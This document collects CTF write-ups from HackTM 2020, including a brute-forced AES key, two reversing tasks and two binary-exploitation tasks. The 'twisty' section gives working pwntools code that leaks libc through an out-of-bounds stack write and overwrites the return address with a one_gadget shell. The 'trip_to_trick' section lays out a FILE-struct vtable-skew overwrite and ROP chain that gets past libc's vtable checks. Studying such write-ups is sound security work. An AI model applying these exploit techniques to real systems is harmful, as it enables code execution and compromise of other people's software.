We explored many different ideas as to how the key is derived. Looking up the image in stega tools showed nothing interesting. Pretty quickly we reached the conclusion that there is an upper part and a lower part to each symbol. The top can be one of four characters, the bottom can be one of five characters. Interestingly, the symbols can be sequenced using the number of lines per symbol. A special curved character could signify the zero character (when both parts are empty). The three pixelated symbols are unknown, we probably need to bruteforce them once more information is known.

In total there are 59 symbols. Each one can be one of 20 values, resulting in 20^59 possible combinations (5.764608e+76). This was suspiciously close to half of the representation space of 256bit keys – 1.157921e+77. Since the bottom has 5 possible “digits” and the top has 4, we can look at the symbols as two-digit base5 numbers with the top character being more significant (if we look at it the other way round we get values above 20). Now we can represent the symbol array as 59 base20 digits, which we did here:

DIGITS = [19, 3, 10, 15, 2, -6, 16, 16, 18, 12, 19, 6, 19, 12, 8, -6, 5, 8, 17, 18, 18, 5, 9, 3, 11, 10, 1, 10, 10, 0, 10, -6, 0, 8, 18, 10, 0, 15, 18, 5, 18, 14, 19, 1, 1, 0, 4, 6, 15, 4, 11, 16, 10, 8, 14, 5, 13, 16, 9]

Now we took a leap of faith and assumed the key is zero-extended, meaning the key is prepended with a 0 bit. Therefore we just need to plug in the calculated key as is. The only thing left is to loop over the pixelated symbols and look for a plaintext which includes HackTM.

from Crypto.Cipher import AES

DIGITS = [19, 3, 10, 15, 2, -6, 16, 16, 18, 12, 19, 6, 19, 12, 8, -6, 5, 8, 17, 18, 18, 5, 9, 3, 11, 10, 1, 10, 10, 0, 10, -6, 0, 8, 18, 10, 0, 15, 18, 5, 18, 14, 19, 1, 1, 0, 4, 6, 15, 4, 11, 16, 10, 8, 14, 5, 13, 16, 9]
cipher = '059fd04bca4152a5938262220f822ed6997f9b4d9334db02ea1223c231d4c73bfbac61e7f4bf1c48001dca2fe3a75c975b0284486398c019259f4fee7dda8fec'.decode("hex")
iv = '42042042042042042042042042042042'.decode('hex')

def get_key_from_digits(digits):
    key = 0
    for i in range(len(digits)):
        key += digits[len(digits) - 1 - i] * (20 ** i)

    key = hex(key)
    key = key[2:-1]
    return key

def decrypt(cipher, key):
    key = key.decode('hex')
    aes = AES.new(key,AES.MODE_CBC, iv)
    return aes.decrypt(cipher)

for i in range(20):
    for j in range(20):
        for k in range(20):
            digits = DIGITS
            digits[5], digits[15], digits[31] = i,j,k
            if 'HackTM' in decrypt(cipher, get_key_from_digits(digits)):
                print decrypt(cipher, get_key_from_digits(digits))

After under a second, the output is:

HackTM{can_1_h@ve_y0ur_numb3r_5yst3m_??}000000000000000000000000

baby_bear

Baby Bear

Framework

baby_bear challenge was classified as reversing challenge. The file was given and was 64-bit x86-64 statically linked file.
In order to get the flag, it was needed to connect a remote session and challenge the remote session baby_bear process. Runnning readelf on the baby_bear file find two sections, one of them is UPX0 and the other is bss. After we’ve extracted the UPX section is was found that this is a wrong analyze of readelf and not a real UPX-packed executable. No libc is linked. All communication etc. is done via direct syscalls.

First Look

At the beginning, the process opened /dev/urandom and read 0x10 bytes. Afterward it takes those bytes and convert them to a bit stream.
At the end of the initialization state the start procedure jumps to the next part of the program.
The next part is a number of small assembly snippets, each of which implements a different obfuscated check for whether the next bit in the input stream is zero of one, and performs some operations as a result. Operations can include writing a bit to the output stream, and jumping to another snippet. There are a lot of different snippets, which jump to each other, and it is not clear what the overall algorithm is.

running the baby_bear file result is

$ ./baby_bear

and wait for user input.

Deeper inspection

The only real function is the one at at 0x4000B0.
This function write an input byte of 0 or 1 to the output stream, and if the number of bytes written to the output is 0x2E, it stops the ‘calculation’ process, and starts the input and checking process.
It asks the user for some input bytes, then runs the same calculation process it ran on
the random bytes on the input.
If the output of the two algorithms are the same (0x2E bytes) the flag is retrieved.
All the code snippets can read bits from the input stream, do some calculations and call another snippet or call the write to memory function.

Solving

In the call/jump flow we assume no function is returned. So we reversed all the code snippet and translate them to python, where any jump or call converted to call the correlated snippet function.
After we got a python script which emulate the same output as the algorithm as the baby_bear binary, we built a table of all the inputs bitstreams which are less than 8 bits and call to the start of the algorithm in the 2nd time. Because this algorithm is deterministic and consume each bit only once, we were able to concatenate multiple bitstreams from the input in order to get the requested output.
Now we just had to split the bitstream baby_bear wrote and find in our table. and pack it back to a 19 bytes stream and write it to the remote baby_bear process stdin.

ananas

hackTM2020 ananas writeup

We are given a ananas.pcapng packet capture and a hint that a camera/video is involved…

1. obtaining a binary

this looks like a windows binary, so we save the binary into ananas.exe

> file ananas.exe
ananas.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

and indeed, it is a windows executable binary.

2. static analysis of ananas.exe

After some analysis in IDA, we note that there are some send and recv operations involved and also some frame grabber code used for capturing a 90×160 sized images.
– 90×160 = 14400 pixel are grabbed in grab_pixels
– they are converted into grayscale, resulting in an array of 14400 bytes


lets examine the obfuscate_and_send() function:


So it seems that the following steps take place for each frame of size 90×160:

  1. 14400 pixels grayscale are grabbed
  2. a 4 bytes ‘key’ is received from a peer
  3. this ‘key’ is used in (next_index() % i) to derive an index to be swapped
  4. the current pixel is swapped with whatever index is obtained in step 3
  5. the obfuscated grayscale data is sent over the socket

Lets see if this make sense in the remainder of the packet capture:


We see:
1. 4 bytes are sent from 134.209.225.118. This matches the key bytes
2. a payload of 14120 bytes is sent to 134.209.225.118
3. a payload of 280 bytes is sent to 134.209.225.118

so, we receive 4 bytes and send out 14400 bytes. This matches our static analysis

In order to retrieve the grayscale frames we need to:

  • extract each 14400 bytes payload
  • extract the corresponding 4 bytes key
  • perform a deobfuscation of the payload

3. Extracting payload frames and keys

we used scapy in order to dump each key into a keyfile_X and each 14440 bytes into a packet_X files:

from scapy.all import *
with PcapReader("ananas.pcapng") as pcap_reader:
for pkt in pcap_reader:
if pkt.haslayer(TCP) and pkt[TCP].sport == 18812 and pkt[TCP].flags == "PA":
open("keyfile_%d" % index, "wb").write(pkt[Raw].load)
elif pkt.haslayer(TCP) and pkt[TCP].dport == 18812 and pkt[TCP].flags == "A" and pkt.haslayer(Raw) and len(pkt[Raw].load) == 14120:
packet_data = pkt[Raw].load
elif pkt.haslayer(TCP) and pkt[TCP].dport == 18812 and pkt[TCP].flags == "PA" and pkt.haslayer(Raw) and len(pkt[Raw].load) == 280:
packet_data += pkt[Raw].load
open("packet_%d" % index, "wb").write(packet_data)
packet_data = b""
index += 1

4. Deobfuscating the packets

when we examine the next_index() function, it is clear that for each initial key, the sequence of the resulting 14399 swap indices can be inferred
by running the next_index() on that initial key and collecting the indices.

Given those 14399 index-pairs, how do we reverse the obfuscation?

Let’s try an example. Assume we apply the following sequence of swaps, in that order:

(0, 30)  //pixel[0] is swapped with pixel[30]
(30, 70) // pixel[30] (aka pixel[0]) is swapped with pixel[70]

this results in:

pixel[0]  ended up in pixel_obf[70]
pixel[30] ended up in pixel_obf[0]
pixel[70] ended up in pixel_obf[30]

now, if we apply the swaps in reverse from the last one, we get:

(30, 70)
(0, 30)
pixel_obf[70] ended up in pixel[0]
pixel_obf[0]  ended up in pixel[30]
pixel_obf[30] ended up in pixel[70]

which is exactly the original order!

The following C code opens keyfile and packet.obf, uses the key to generate and collect 14399 index swaps and then applies the swaps in the reverse order:

#define BUFSIZE 14400
int main(int argc, char** argv) {
int inkeyfd = open(argv[1], O_RDWR); // keyfile
int infd = open(argv[2], O_RDWR);  //packet.obf
int outfd = open(argv[3], O_RDWR | O_CREAT, 0666); //packet.deobf

char buffer[BUFSIZE];
read(inkeyfd, buffer, 4);
key = *(unsigned int*)buffer;
printf("key: %x\n", key);

read(infd, buffer, BUFSIZE);

int swaps[BUFSIZE][2];

for (int i = BUFSIZE - 1 ; i > 0; --i) {
int v7 = ((unsigned short)next_index()) % i;

swaps[i][0] = i;
swaps[i][1] = v7;
}

for(int i = 1; i < BUFSIZE; ++i) {
        char v6 = buffer[swaps[i][1]];
        buffer[swaps[i][1]] = buffer[swaps[i][0]];
        buffer[swaps[i][0]] = v6;
    }

    write(outfd, buffer, BUFSIZE);
    return 0;
}

running the above C code on each packet_X file produces a de-obfuscated file packet_X.deobf which we can convert into a png image and combine all images into an animated gif.

this produces a short film of a guy showing us the flag on his phone.

twisty

Twisty

The Challenge

Author: trupples

Inspired by stackola’s game, I wanted to build my own version, but in C. What could go wrong?

In this challenge, we are given 2 files: An X86_64 executable ‘twisty’ and the corresponding libc (libc-2.23.so).

Running the binary the following game starts:

Pressing ‘?’ shows the different commands:

Reversing twisty

After fiddling a bit with the game and the different commands, we move to reverse the binary, using IDA.

We learn that:

  1. The board is shuffled 500 times by reading from /dev/random upon starting.

  2. The game goes to an endless while loop in its main function until the board is in the right order.

  3. Since there are total of 16 rotation possible ([row/column] * [direction] * [row/column number]), one nibble is used to represent a move.

  4. A buffer of length 2048 bytes is used to store the command history, each byte holding two moves.

  5. The data is laid out in memory in the following structure, which is stored on the main’s function stack.

    struct state {
    char current_board[16];
    char move_history[2048];
    int move_number;
    };
    
  6. When a move is being made, the move’s nibble is stored in history, indexed using move_number, and move_number is incremented.

  1. To implement the ‘undo’ function the history is then accessed at the current move number, the reverse rotation is calculated and performed, and the move number is decreased:

  1. To list the command history the code simply iterates the history cells from beginning until reaching the current move.

  2. There’s a stack canary protection enabled.

Bugs and primitives

By reviewing the decompiled code and running some trial and errors we found the following bugs:

  • When undoing a move there’s no check if the current move_number is positive. So move_number can be set to a negative value.
  • There is no boundary check on the history, when the current move is used to index it. So after writing the 4096’th move, the next move is going to be stored in on the value next to it on the stack, which is the move_number itself. After that, every further move would use the (now one-nibble overwritten) move number to write the history values. Since we can control the amount of moves, as well as the data being written (we can map every possible game move to a nibble value) we get a relative write from the state.history location on the stack. Note that, conveniently, this behavior also allows us to jump over the stack canary, since the first write increments the move_number by 0xf0, the following writes already write after the location of the canary.
  • We can also set the move_number to a negative value and overwrite backwards on the stack.

The plan

So we have a relative write on the stack. It has become apparent that the plan should be to overwrite the return address with using some libc’s address/gadget, and we can hopefully jump to someplace useful.

Info leak

In order to overwrite the address we need to figure out a valid address from libc, which we can then use in order to calculate the base of libc in memory. How can we use our primitive to get a leak?

Turns out the l command (list previous moves) is just what we need. As mentioned above, the first value to get written when history runs out of space is the move_number. If we perform 4096 moves, the next move would write the high nibble of the lowest byte in move_number. If we write 0xf on it we’ll get move_number of 0x10f1. Now when we’ll print the history we’ll get a dump of legal 4096 moves, plus 241 ‘moves’ from the stack after history ends, which sums up to a leak of about 120 bytes.

We used pwntools to automate this process, after sending the l command we get the following print:

r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l r3l

<Repeats 4096 times>

c1u c1u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c1u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u r3l r0r r1r r0l c2u c1d c0u r1r c1u r2l c3u c3d c3d c1d r2r c0u c1d r1r r1l r2l r3l c3d r3l r3l c3d r3l c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u r3r c0u c0d r2l c1d c1d c1d c1d c1d c1d c1d c1d c0u c0u c0u c0u c0u c0u c0d r0l c1d c1d c1d c1d c1d c1d c1d c1d c0u c0u c0u c0u r3r c0u r1l r1l r3l r3l r3l r3l r3l r3l c3d r3l c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u r1r c3d c1d r3r r2r c0u r3l c3d r3l r3l c3d r3l c0u c0u c0u c0u c0u c1u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u c0u r3r r0r r1l r1l r3l r3l r3l r3l r3l r3l c3d r3l c0u c0u c0u c0u c0u c0u r0r c0u c0u c0u c0u c0u c0u c1u c0u c0u c0u c0u c0u c0u c0d c0u c0d r0r c1d c1d c1d c1d c1d c1d c1d c1d c0u c0u c0u c0u c0u

Translating each value to its corresponding nibble and being careful with endianness and nibble location within each byte, we get the following 64 bit values:

0x00000000000010f1
0x0000000000000001
0x75371e09259cf800
0x00007ffff7de59a0
0x0000000000000000
0x0000555555554eb0
0x0000555555554c00
0x00007fffffffddb0
0x0000000000000000
0x0000000000000000
0x00007ffff7a05b97 <—– __libc_start_main
0x0000000000000001
0x00007fffffffddb8
0x0000000100008000
0x0000555555554840

Using gdb we can check the interesting values:

And we’ve found __libc_start_main, which is also our return address! Now we know where libc is loaded, and also have the location of the return address which we aim to overwrite.

Here’s a snippet of the python code to get the leak:

from pwn import *

d = {'c0u': 0,
     'c1u': 1,
     'c2u': 2,
     'c3u': 3,
     'c0d': 4,
     'c1d': 5,
     'c2d': 6,
     'c3d': 7,
     'r0r': 8,
     'r1r': 9,
     'r2r': 10,
     'r3r': 11,
     'r0l': 12,
     'r1l': 13,
     'r2l': 14,
     'r3l': 15,
     }

def nib_to_code(val):
    dd = {k:v for v,k in d.items()}
    return dd[val]

def code_to_nib(code):
    if code not in d:
        print('Not in dict "{}"'.format(code))
        return
    return d[code]


def leak(p):
    p.sendline('l')
    history = p.recvuntil('\n> ').decode('utf8')
    history = history.split('\n')[0]
    print(history)
    tuple_list = history.split(' ')
    if tuple_list[-1] == '':
        tuple_list = tuple_list[:-1]
    b = ""
    buffer = []
    for i in range(2048, len(tuple_list) // 2):
        high = code_to_nib(tuple_list[i * 2])
        low = code_to_nib(tuple_list[i * 2 + 1])
        res = high * 16 + low
        buffer.append(res)
    ba = bytearray(buffer)
    print(ba)
    if len(buffer) % 8 > 0:
        print("WARNING buffer not aligned ({})".format(len(buffer)))
    for i in range(0, len(buffer) - len(buffer) % 8, 8):
        print(('0x' + '{:02x}' * 8).format(buffer[i + 7], buffer[i + 6], buffer[i + 5], buffer[i + 4],
                                           buffer[i + 3], buffer[i + 2], buffer[i + 1], buffer[i]))
    return ba

if __name__ == '__main__':
    p = process('twisty')
    for i in range(4097):
        print("running command {}".format(i))
        p.recvuntil('\n> ').decode('utf8')
        p.sendline('r3l')
    print(p.recvuntil('\n> ').decode('utf8'))
    ba = leak(p)
    ptr_list = []
    for i in range(0, len(ba), 8):
        ptr = struct.unpack('<Q', ba[i:i+8])[0]
        print('0x%016x'%ptr)
        ptr_list.append(ptr)
    libc_start_main_ptr = ptr_list[10]
Writing the return address and One-Gadget

We ran one_gadget on the provided libc, which provided us with a very useful one gadget to run execve('/bin/sh', NULL, NULL)

By finding the offset of __libc_start_main in the provided libc, we deduce the correct address of our gadget. In order to write to the correct location on the stack, we take the move_number back using the u command, and after some trial and error manage to get to the correct location. Now we can simply send the moves to write our desired address, one nibble at a time. Here’s a snippet of python code:

def write_nibble(p, val):
    p.sendline(nib_to_code(val))
    p.recvuntil('\n> ')

def undo(p, cnt=1):
    for i in range(cnt):
        p.sendline('u')
        p.recvuntil('\n> ')

def write_addr(p, addr):
    for i in range(8):
        b = addr & 0xff
        addr = addr >> 8
        write_nibble(p, (b & 0xf0) >> 4)
        write_nibble(p, b & 0x0f)

# ...continue of main above
undo(p, (len(ptr_list) - 10) * 16 + 1)
OFFSET_OF_LIBC_START_MAIN = 0x20830
OFFSET_OF_GADGET_IN_LIB_C = 0x45216
load_offset = libc_start_main_ptr - OFFSET_OF_LIBC_START_MAIN
gadget_offset = load_offset + OFFSET_OF_GADGET_IN_LIB_C
write_addr(p, gadget_offset)


Solving Rubik’s square

We’re almost done, there’s just one last problem. In order to jump to our gadget we need to return from the function, and it seems the only way to go out of the while was to get the board to the correct location (i.e solving the Rubik’s square game):

Initially we tried to use our relative write primitive to write on the board itself (which as mentioned is also located on the stack). This proved to be quite tricky, because every write is also a different game move, so we end up scrambling the board after every write. We’ve decided to settle with the non-hacky approach of implementing the algorithm to solve it. After overwriting the return address on the stack, we read the current board state from the command line, and create the 50-150 moves needed to solve it. Note we can still ‘play’ the game normally but the history is now being written on the stack, below the return address. These stack values are not used anyway.

Now to run the resulting script on the server:

trip_to_trick

Trip to Trick

This deceptively simple challenge proved a great exercise in abusing FILE structs.

Literally gifting you the entire libc of the process, as well as two arbitrary QWORD writes – you’d expect exploitation to be a walk in the park. In the following sections we’ll dive into what the program does and how we slew the beast.

Into thickening plots? Look into [the last section](# The Plot Thickens), where we dissect why compromising this system in any other is really hard

Quick, grab the supplies!

We’re given several things:

  • a simple instruction to nc <ip> <port>

  • trip_to_trick – the executable attached to the nc

  • libc – libc.so.6 is available, as well as the offset of system, which changes every time you connect

  • The ability to write anything anywhere, twice.

Wait, That’s It?

The main function does pretty much nothing.

Setup

  1. Seccomped in sandbox allowing only open, read, write, mmap, and exit.
  2. stdin/out/err are set as non-buffering
  3. and some irrelevant place in libc is mprotected to read-only.

Then, logic

Which is all contained in the two screenshots above.

That’s it.

IF you could get it to execute, that is

Let’s say an ELF needs another ELF if it crashes when ran without it. Following this definition, trip_to_trick needs the givenlibc.so.6 to correctly initialize, and libc.so.6 needs a specific ld.so.2 as well. We started off by patching the functions that crash when initializing on an ubuntu18.04 libc.so, but later had the nerve to look for ld.so compiled with libc 2.2.9, and the following command loads, initializes, and runs:

LD_PRELOAD=./libc.so.6 ld.so.2 ./trip_to_trick

Improvise, Adapt, Overcome

Two arbitrary writes and the address of libc sounds like a lot, sadly – it isn’t. All the ideas we scratched, described [here](# Epilogue), have lead us to understanding we have to get more than 16 bytes into the address space of the process to pwn, and that we have to do that by breaking stdin. But… how?

1 Byte at a Time

stdin is a pointer to a struct embedded in the .DATA section of libc, defined as struct FILE _IO_2_1_stdin_. This is a good-enough reference to the struct. Our objective is to cause scanf to read as much as we can into stdin->IO_read_ptr. Since stdin is set as _IONBF first thing, it’s not going to buffer any data, and just read as much as scanf requires, which is one byte at a time.

First attempt

It would stand to reason that if we change the stdin->flags field to show the file is fully buffered, suddenly the stream would fill its internal buffer, and just copy the requested size out. That assumption proved plain false, as changing the flags and breaking on read shows:


But why?

scanf sinks into __vfscanf_interal which in turn sinks into __uflow through _IO_getc_unlocked, which in turn calls the file operation function IO_file_underflow. Then we sink into:
read(stdin->_fileno, stdin->IO_read_ptr, stdin->IO_read_end - stdin->IO_read_ptr);

8 Bytes to ∞ Bytes

Surprisingly, stdin->IO_read_end - stdin->IO_read_ptr is always 1, regardless of the buffering state. What more, all stdin->IO_read_* point into a 8-byte scratch space in _IO_2_1_stdin_ itself (seems like it’s to _old_offset)! By just controlling stdin->IO_read_end we can overflow as much as we want.

It’s decided that the first scanf will be used to overwrite stdin->IO_read_end, then the second scanf will effectively read(1, &_IO_2_1_stdin_, <size we control>).

Constraints

The following scanf is going to overwrite some part of the .DATA section, starting somewhere inside _IO_2_1_stdin. However, the lock field must be preserved. Otherwise, upon returning from the read, attempting to unlock it will SIG_SEGV. Lucky for us it points right back into libc so we can predict it’s address. stdin->lock resides just 5 bytes after our overwrite begins, thus we can’t use the first 0xd bytes for anything useful, let alone hope that scanf could parse them as integers. This also means this read overflow is (currently) our last way to influence the flow.

∞ Bytes to ⚑ Bytes

[Recall](# Then, logic) that the first thing that happens after the second scanf is fclose(stdout). Since stdout is our only way of getting information out (seccomp and all), it stands to reason we’d like to get the file before it is closed. stdout, like stdin is a pointer to _IO_2_1_stdout, which is a struct FILE in libc. Luckily,

We can overwrite it entirely with our new read primitive, and so we do.

Every Good File Stream Must Come to fClose

To avoid having stdout be closed we have to look at the inner workings of fclose. It basically has some menial tasks to take care of:

  1. un_link the stream if it was linked
  2. Flush the stream if it’s an input stream and has data yet to be written
  3. Call the stream specific close function (which in our case closes the file descriptor)

We control the data in IO_2_1_stdout entirely, so we can easily make it skip or flow through any path we want.

un_link

is handled by IO_un_link and is the least useful action of the three, as it contains no indirect calls. It’s easily skipped, as it only does something if (fp->flags & _IO_LINKED)

The rest occurs only if (fp->_flags & _IO_IS_FILEBUF), and is handled by the function IO_file_close_it.

Flush

To flush, the stream must be an input one. This means its _IO_CURRENTLY_PUTTING flag is set, and _IO_NO_WRITES is not. If all is well, we simply sink into IO_file_do_write(stdout, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base).
Here we 2 ‘virtual’ calls to choose from,

  1. stdout->vtable->seek
  2. stdout->vtable->write

Note that _IO_SYS<SOMETHING> is a macro that calls the vtable function of the fp with the given args.

8   static ssize_t IO_file_do_write (FILE *fp, const char *data, size_t to_do)
439 {
                                            ...
441   if (fp->_flags & _IO_IS_APPENDING) fp->_offset = _IO_pos_BAD;

448   else if (fp->_IO_read_end != fp->_IO_write_base)
449     {
                      ...
451         = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
                                            ...
455     }
456   count = _IO_SYSWRITE (fp, data, to_do);

The call to seek is a bummer to use, since the arguments are 2 numbers rather than pointers to our data. It can be easily avoidable as it only happens if (!fp->flags & _IO_IS_APPENDING). We control them both, and don’t have any constraints over fp->IO_read_end.

The call to write, on the other hand, is amazingly useful. We control the entire buffer in the first argument, the pointer passed as the second argument, as well as the value passed in the third. I’ll take that any day.

Close

To close the underlying file descriptor, the _IO_file_close_it function simply calls stdout->vtable->close with stdout as an argument, and there are no real constraints over this call. It just happens if the flags are right.

128 _IO_new_file_close_it (FILE *fp) {
                                                ...
142         int close_status = ((fp->_flags2 & _IO_FLAGS2_NOCLOSE) == 0
143                                                         ? _IO_SYSCLOSE (fp) : 0);
                                            ...
} 

The Minor Hitch

Modern libc releases realized the weakness in having a pointer to a file operation vtable that can be easily overwritten in the FILE struct. Before each call to a pointer from the vtable, libc now checks that the vtable address used is in the __libc_IO_vtables section of libc, and crashes the program if it isn’t. Implementation details of that here. The above doesn’t protect the vtables from being misaligned, though. Our objective thus becomes to generate an arbitrary call by slightly sliding the vtable of stdout.

The Royal Straight Flush

Overwrite outline:

  1. flags is to have _IO_CURRENTLY_PUTTING, _IO_IS_FILEBUF, IO_IS_APPENDING set, and must have _IO_LINKED, _IO_NO_WRITES off.
  2. fileno == fileno_stdin
  3. _IO_read_end == _IO_write_base to avoid the call to stdout->vtable->flush(...)
  4. _IO_write_base to be ((char*)&_IO_file_jumps.close) - (&_IO_file_jumps.write - &IO_file_jumps.read))
  5. _IO_write_ptr to be (_IO_write_base + POINTER_SIZE)
  6. vtable is to be ((char*)&_IO_file_jumps) + (&_IO_file_jumps.write - &IO_file_jumps.read)
  7. stdin->lock, stdout->lock to remain unchanged. These are simply pointers into another place in libc so we overwrite them with their original value.
  8. The very first byte is '\0' since then scanf assumes there is no data to read, and fails without changing the output arguments, allowing safe passage through the second *where = what

The rest can be whatever you like.

_IO_file_jumps is the vtable that the I/O streams use, and as such is in the __libc_IO_vtables section. In this overwrite, we are offsetting the vtable pointer by the exact amount needed for the pointer to write to actually be read. Then we effectively get read(stdin, &close_function_to_be_used, POINTER_SIZE).

We can then send the address of an gadget we want, and it will be called when _IO_file_close_it calls stdout->vtable->close.

The Endgame

To quickly and easily create a ROP chain that reads the file, we used pwntools. It’s neat, if you’re not in on the fun, make sure you familiarize yourself with it.

Looking at the state of the registers when stdout->vtable->close is closed we can see:


$rbp is pointing to the start of the address of the vtable, which we control, which is great because it’s just enough scratch space for a stack pivot. A quick run of pwntools.rop.ROP(ELF("libc.so.6")) swiftly comes up with a leave; ret. The address of this gadget is the address we’ll send to be the address of close. Now all that is left is to make sure a rop.migrate(larget_scratch_space_in_our_buffer) chain is at where $rbp is pointing to, and a VERY simple rop chain that opens /home/pwn/flag, reads it into the .data section, and writes it to stdout is what we migrate to.

The end product looks somewhat like this, this is written to &_IO_2_1_stdin + 0x83(which is where the _IO_read_ptr points to):

0000: '0' * 5
0005: &stdin_lock
....
0b45: &_IO_2_1_stdout.vtable + 8   ; this will overwrite the stdin->_IO_read_end
....
; fake STDOUT starts here, at offset 0cdd. Written offsets are now relative to 0xcdd
0000: 0x3882                                             ; these are the fake flags of stdout.
...
0020: &stdout_vtable.close - 8       ; overwrites IO_write_base. 
                                                                     ; it's skewed since the we also skew the vtable
0028: &stdout_vtable.close             ; overwrites IO_write_end
....
0048: 0                                                      ; required to not crash inside do_write (unsaved markers)
0070: stdin_fileno                                  
0074: 0
0078: &stdout_lock
00c0: 0
00d8: &_IO_file_jumps - 8
00e0: READ_FLAG_ROP_GADGETS
....
0440: MIGRATE_TO_00E0_GADGETS

and we are sending the address of the leave; ret pivot over the socket, it’s not part of the overwrite buffer.

Conclusion

I loved the way this exercise gives you everything about libc, and 2 arbitrary writes, and still drags your face through the dirt looking for simple solutions that are covered by libc mitigations. While being a fun exercise for exploiting memory corruptions, it was also a good lesson on libc mitigations and stream management (speaking as someone who knew close to nothing about how libc manages streams prior to this). So long and thanks for all the fish. And for reading.

Epilogue

The Plot Thickens

Described here are ideas we tried and scratched, in order of them happening.

#### Seccomp sucks!

The first think we wanted to do was overwrite stdout->IO_backup_space to a /bin/sh that exists in libc, then j_free_hook with the gifted pointer to system and that would have been the end of it.

We had this up and running pretty fast as a POC locally, and got a SIGSYS as expected.

pthread::pointer_guard sucks!

While looking for ways to get more data in, we came across we found this:


This is a monster call, since calling something like gets (or something similar that reads from stdin) allows you to read whatever you want into the stack, allowing instant ROP. It also does not require any tampering with the inner workings of libc.
We didn’t know what fs:30 was at first, but quick discovered it’s akin to the stack canary, which gave this method an F.

IO_validate_vtable sucks!

We spent some time looking for a call that is not protected by the IO_validate_vtable function. This function is the one that checks if the vtable is in the __libc_io_vtable section. This time was wasted as we did not realize (at the time) this was a cannon mitigation introduced into libc. No such unprotected calls were found and moving the vtable to point into our overridden buffer resulted in a SIGKILL or a SIGSYS.